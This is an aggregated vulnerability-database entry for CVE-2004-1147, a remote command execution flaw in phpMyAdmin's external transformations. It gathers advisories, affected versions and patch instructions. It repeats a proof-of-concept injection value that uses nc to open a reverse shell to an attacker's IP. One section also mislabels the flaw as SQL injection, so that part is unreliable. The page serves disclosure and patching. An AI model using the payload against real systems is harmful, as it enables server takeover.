CVE-2004-1147
CVSS 10.0
Published: 2005-01-10 00:00:00
Revised: 2016-10-17 22:51:44

[Original] phpMyAdmin 2.6.0-pl2, and other versions before 2.6.1, with external transformations enabled, allows remote attackers to execute arbitrary commands via shell metacharacters.


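[CNNVD] phpMyAdmin ExternalTransformations remote command execution vulnerability (CNNVD-200501-165)

        phpMyAdmin is a free tool for administering MySQL databases through a web interface.
        A remote code execution vulnerability exists in phpMyAdmin 2.6.0-pl2 and other versions before 2.6.1.
        When external transformations are enabled in the configuration, a remote attacker can exploit this vulnerability to execute arbitrary commands through the shell.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)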

cpe:/a:phpmyadmin:phpmyadmin:2.5.2
cpe:/a:phpmyadmin:phpmyadmin:2.5.1
cpe:/a:phpmyadmin:phpmyadmin:2.5.4
cpe:/a:phpmyadmin:phpmyadmin:2.5.5
cpe:/a:phpmyadmin:phpmyadmin:2.5.5_rc2
cpe:/a:phpmyadmin:phpmyadmin:2.5.5_rc1
cpe:/a:phpmyadmin:phpmyadmin:2.5.7
cpe:/a:phpmyadmin:phpmyadmin:2.5.5_pl1
cpe:/a:phpmyadmin:phpmyadmin:2.5.7_pl1
cpe:/a:phpmyadmin:phpmyadmin:2.6.0_pl3
cpe:/a:phpmyadmin:phpmyadmin:2.5.0
cpe:/a:phpmyadmin:phpmyadmin:2.4.0
cpe:/a:phpmyadmin:phpmyadmin:2.5.6_rc1
cpe:/a:phpmyadmin:phpmyadmin:2.6.0_pl2
cpe:/a:phpmyadmin:phpmyadmin:2.6.0_pl1

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1147
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1147
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-165
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=110295781828323&w=2
(UNKNOWN)  BUGTRAQ  20041213 Multiple vulnerabilities in phpMyAdmin
http://www.exaprobe.com/labs/advisories/esa-2004-1213.html
(UNKNOWN)  MISC  http://www.exaprobe.com/labs/advisories/esa-2004-1213.html
http://xforce.iss.net/xforce/xfdb/18441
(UNKNOWN)  XF  phpmyadmin-command-execute(18441)

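- Vulnerability information

phpMyAdmin ExternalTransformations remote command execution vulnerability
Critical  Input validation
2005-01-10 00:00:00 2005-10-20 00:00:00
Remote
        phpMyAdmin is a free tool for administering MySQL databases through a web interface.
        A remote code execution vulnerability exists in phpMyAdmin 2.6.0-pl2 and other versions before 2.6.1.
        When external transformations are enabled in the configuration, a remote attacker can exploit this vulnerability to execute arbitrary commands through the shell.

- Advisories and patches

        The vendor has released an upgrade patch to fix this security issue. The patch is available at:
        http://www.phpmyadmin.net/home_page/downloads.php

- Vulnerability information (24817)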

phpMyAdmin 2.x External Transformations Remote Command Execution (EDBID:24817)
php webapps
2004-12-13 Verified
0 Nicolas Gregoire
N/A
source: http://www.securityfocus.com/bid/11886/info

phpMyAdmin is reported prone to multiple remote vulnerabilities. These issues can allow remote attackers to execute arbitrary commands and disclose files on a vulnerable computer. These issues result from insufficient sanitization of user-supplied data.

The command execution is reported to be present since phpMyAdmin 2.6.0-pl2. The file disclosure is present since phpMyAdmin 2.4.0.

F\';nc -e /bin/sh $IP 80;echo \'A		

- Vulnerability information (F35314)

phpMyAdmin261rc1.txt (PacketStormID:F35314)
2004-12-30 00:00:00
Nicolas Gregoire  exaprobe.com
advisory,vulnerability
CVE-2004-1147,CVE-2004-1148

phpMyAdmin versions prior to 2.6.1-rc1 suffer from command execution and file disclosure vulnerabilities.

Exaprobe
                            www.exaprobe.com

                           Security Advisory

 Advisory Name: Multiple vulnerabilities in phpMyAdmin
  Release Date: 13 December 2004
   Application: phpMyAdmin prior to 2.6.1-rc1
      Platform: Any webserver running PHP
      Severity: Remote code execution
        Author: Nicolas Gregoire <ngregoire@exaprobe.com>
 Vendor Status: Updated code is available
CVE Candidates: CAN-2004-1147 and CAN-2004-1148
     Reference: www.exaprobe.com/labs/advisories/esa-2004-1213.html


Overview :
==========

phpMyAdmin is a tool written in PHP intended to handle the 
administration of MySQL over the Web. Currently it can create and
drop databases, create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields, manage privileges,
export data into various formats and is available in 47 languages.


Technical details :
===================

Command execution :

	- bug introduced in 2.6.0-pl2
	- attacker does *not* need access to the phpMyAdmin interface
	- PHP safe mode must be off
	- external transformations must be activated
	- sample of offensive value : F\';nc -e /bin/sh $IP 80;echo \'A

File disclosure :

	- attacker needs access to the phpMyAdmin interface
	- PHP safe mode must be off
	- $cfg['UploadDir'] must be defined
	- exploitation is done via 'sql_localfile'


Vendor Response :
=================

After notification by Exaprobe, maintainers of the phpMyAdmin
project have released version 2.6.1-rc1 which fixes these two
vulnerabilities.


Recommendation :
================

Upgrade to 2.6.1-rc1 or newer.
Deactivate uploads and transformations if possible.


CVE Information :
=================

The Common Vulnerabilities and Exposures (CVE) project has assigned 
the following names to these issues.  These are candidates for 
inclusion in the CVE list (http://cve.mitre.org), which standardizes 
names for security problems.

  CAN-2004-1147  Command execution in phpMyAdmin
  CAN-2004-1148  File disclosure in phpMyAdmin

-- 
Nicolas Gregoire ----- Consultant en S    

- Vulnerability information

12330
phpMyAdmin External Transformations Remote Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

phpMyAdmin contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that on systems where PHP safe mode is disabled and external MIME-based transformations are activated, MySQL data is not verified properly and will allow an attacker to inject or manipulate SQL queries, which may lead to a loss of integrity.

- Timeline

2004-12-13 Unknown
2004-12-13 Unknown

- Solution

Upgrade to version 2.6.1-rc1 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): Setting PHP safe mode to ON. If not feasible, deactivate MIME-based external transformations.

- Vulnerability information

phpMyAdmin Multiple Remote Vulnerabilities
Input Validation Error 11886
Yes No
2004-12-13 12:00:00 2009-07-12 08:07:00
Discovery is credited to Nicolas Gregoire <ngregoire@exaprobe.com>.

- Affected program versions

S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0 i386
S.u.S.E. Linux 8.0
phpMyAdmin phpMyAdmin 2.6 .0pl3
phpMyAdmin phpMyAdmin 2.6 .0pl2
+ Gentoo Linux 1.4
+ Gentoo Linux
+ Gentoo Linux
+ Gentoo Linux
phpMyAdmin phpMyAdmin 2.6 .0pl1
phpMyAdmin phpMyAdmin 2.5.7 pl1
phpMyAdmin phpMyAdmin 2.5.7
phpMyAdmin phpMyAdmin 2.5.6 -rc1
phpMyAdmin phpMyAdmin 2.5.5 pl1
phpMyAdmin phpMyAdmin 2.5.5 -rc2
phpMyAdmin phpMyAdmin 2.5.5 -rc1
phpMyAdmin phpMyAdmin 2.5.5
phpMyAdmin phpMyAdmin 2.5.4
phpMyAdmin phpMyAdmin 2.5.2
phpMyAdmin phpMyAdmin 2.5.1
phpMyAdmin phpMyAdmin 2.5 .0
phpMyAdmin phpMyAdmin 2.4 .0
phpMyAdmin phpMyAdmin 2.6.1 -rc1

- Unaffected program versions

phpMyAdmin phpMyAdmin 2.6.1 -rc1

- Vulnerability discussion

phpMyAdmin is reported prone to multiple remote vulnerabilities. These issues can allow remote attackers to execute arbitrary commands and disclose files on a vulnerable computer. These issues result from insufficient sanitization of user-supplied data.

The command execution is reported to be present since phpMyAdmin 2.6.0-pl2. The file disclosure is present since phpMyAdmin 2.4.0.

- Exploit

An exploit is not required.

The following proof of concept for the command execution is available:
F\';nc -e /bin/sh $IP 80;echo \'A

- Solution

Gentoo has released an advisory to provide updates for this issue. Updates may be applied by issuing the following commands as the superuser:

emerge --sync
emerge --ask --oneshot --verbose ">=dev-db/phpmyadmin-2.6.1_rc1"

The vendor has released an advisory and phpMyAdmin 2.6.1-rc1 to address these issues.

SuSE Linux has released a security summary report (SUSE-SR:2005:003) that contains fixes to address this and other vulnerabilities. Customers are advised to peruse the referenced advisory for further information regarding obtaining and applying appropriate updates.

